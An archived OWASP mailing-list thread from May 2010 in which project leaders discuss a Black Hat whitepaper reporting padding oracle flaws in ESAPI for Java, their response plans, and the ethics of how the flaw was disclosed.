[Esapi-user] [Esapi-dev] [Owasp-leaders] Crypto attack and OWASP
jim.manico at owasp.org
Sun May 2 17:40:51 EDT 2010
It's my opinion that OWASP needs an organization-wide security
notification email list but I was turned down. And thats ok. So for
now we can email the esapi-dev and the esapi-users list with any
On May 2, 2010, at 2:15 PM, Chris Schmidt <chrisisbeef at gmail.com> wrote:
> I think this also may partially be a result of not having a well
> defined and documented process for reportig vulnerabilities in the
> code. Did we ever get anywhere with setting up a mailing list or group
> for security notifications?
> Sent from my iPwn
> On May 2, 2010, at 2:55 PM, "Jeff Williams" <jeff.williams at owasp.org>
>> IMHO this is just one more sign of a healthy security ecosystem.
>> There will always be folks who think it's 37337 to release an
>> unknown exploit regardless of the harm it causes. But complaining
>> about it won't help. No matter what, we need to have a measured
>> response capability ready. It's entirely possible that this is an
>> esoteric risk that doesn't really expose any real applications,
>> however it could also be critical. At this point we don't know. I'm
>> looking forward to evaluating the alleged flaw, whatever it might be.
>> -----Original Message-----
>> From: owasp-leaders-bounces at lists.owasp.org [mailto:owasp-leaders-
>> bounces at lists.owasp.org] On Behalf Of Jim Manico
>> Sent: Sunday, May 02, 2010 1:30 PM
>> To: owasp-leaders at lists.owasp.org; ESAPI-Developers; ESAPI-Users
>> Subject: Re: [Owasp-leaders] Crypto attack and OWASP
>> We deprecated 1.4 encryption and are seeking bids for professional
>> cryptographic-centric review of ESAPI 2.0 rc6 before we promote ESAPI
>> to GA (general availability). I have stated on several occasions that
>> no one should be using ESAPI for cryptographic storage in production
>> apps - yet.
>> However, I do have issue with the irresponsible nature of this
>>> We leave the finding of thes bugs as an exercise for readers
>> And I know that members of OWASP would NEVER pull a stunt like this
>> any vendor. Our ethics put community and open way above glory-
>> Jim Manico
>> On May 2, 2010, at 1:50 AM, Christian Heinrich <christian.heinrich at owasp.org
>>> To quote https://media.blackhat.com/bh-eu-10/whitepapers/Duong_Rizzo/BlackHat-EU-2010-Duong-Rizzo-Padding-Oracle-wp.pdf
>>> "5.3.2 OWASP ESAPI
>>> OWASP ESAPI 20, which stands for OWASP Enterprise Security API
>>> Toolkits, is a project that claim to “help software developers gu
>>> against security-related design and implementation flaws.” Howe
>>> found that all OWASP ESAPI for Java up to version 2.0 RC2 are
>>> vulnerable to Padding Oracle attacks 21. There were some significant
>>> changes in ESAPI Encryption API since 2.0 RC3 22. Unfortunately,
>>> these changes are heading towards the correct direction, i.e.
>>> the ciphertex or using an authenticated encryption mode, but at the
>>> time of this writing, there are still some bugs in the latest
>>> implementation 23 that make applications using ESAPI for Java still
>>> vulnerable to Padding Oracle attacks. ."
>>> On Fri, Mar 5, 2010 at 12:15 PM, Nam Nguyen <namn at bluemoon.com.vn>
>>>> Quote: We show that even OWASP folks can't get it right, how can an
>>>> average Joe survive this new class of vulnerabilities?
>>>> Anyone going to BH-EU?
>>> Christian Heinrich - http://www.owasp.org/index.php/user:cmlh
>>> OWASP "Google Hacking" Project Lead - http://sn.im/
>>> OWASP-Leaders mailing list
>>> OWASP-Leaders at lists.owasp.org
>> OWASP-Leaders mailing list
>> OWASP-Leaders at lists.owasp.org
>> Esapi-dev mailing list
>> Esapi-dev at lists.owasp.org
> Esapi-user mailing list
> Esapi-user at lists.owasp.org
More information about the Esapi-user